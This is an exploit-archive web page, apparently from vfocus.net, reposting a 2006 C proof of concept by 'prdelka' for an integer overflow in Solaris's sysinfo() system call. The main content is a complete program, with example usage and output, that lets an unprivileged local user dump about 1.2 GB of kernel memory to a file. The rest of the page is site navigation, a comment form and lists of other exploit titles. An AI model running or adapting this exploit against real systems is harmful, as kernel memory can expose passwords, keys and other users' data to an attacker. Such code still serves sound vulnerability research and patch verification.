首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Solaris <= 10 sysinfo() Local Kernel Memory Disclosure Exploit
来源:vfocus.net 作者:vfocus 发布时间:2006-07-25  

/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit
* ===================================================================
* Local exploitation of an integer overflow vulnerability in Sun
* Microsystems Inc. Solaris allows attackers to read kernel memory from a
* non-privileged userspace process. The vulnerability specifically exists
* due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c
*
* Example Use.
* $ uname -a
* SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250
* $ ./prdelka-vs-SUN-sysinfo kbuf
* [ Solaris <= 10 sysinfo() kernel memory information leak
* [ Wrote 1294967293 bytes to kbuf
* $ ls -al kbuf
* -rwx------ 1 user other 1.2G Jul 21 23:56 kbuf
*
* -prdelka
*/
#include <sys/systeminfo.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define bufsize 1294967293

int main(int argc,char* argv[]){
int fd;
ssize_t out;
char* output_buffer;
if(argc < 2){
printf("[ Use with <filepath>\n");
exit(1);
}
printf("[ Solaris <= 10 sysinfo() kernel memory information leak\n");
output_buffer = malloc(bufsize);
memset(output_buffer,0,bufsize);
sysinfo(SI_SYSNAME,output_buffer,0);
fd = open(argv[1],O_RDWR|O_CREAT,0700);
if(fd!=-1){
out = write(fd,output_buffer,bufsize);
printf("[ Wrote %u bytes to %s\n",out,argv[1]);
close(fd);
}
exit(0);
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·X7 Chat <= 2.0.4 (old_prefi
·Etomite CMS <= 0.6.1 (usern
·SIPfoundry sipXtapi (CSeq) Rem
·Etomite CMS <= 0.6.1 (rfile
·Cahier de texte 2.0 (Database
·libmikmod <= 3.2.2 (GT2 loa
·PHP-Nuke NukeAI Module 3b (uti
·eIQnetworks License Manager Re
·fipsCMS <= 4.5 (index.asp)
·eIQnetworks License Manager Re
·XMPlay 3.3.0.4 (ASX Filename)
·AIM Triton 1.0.4 (SipXtapi) Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved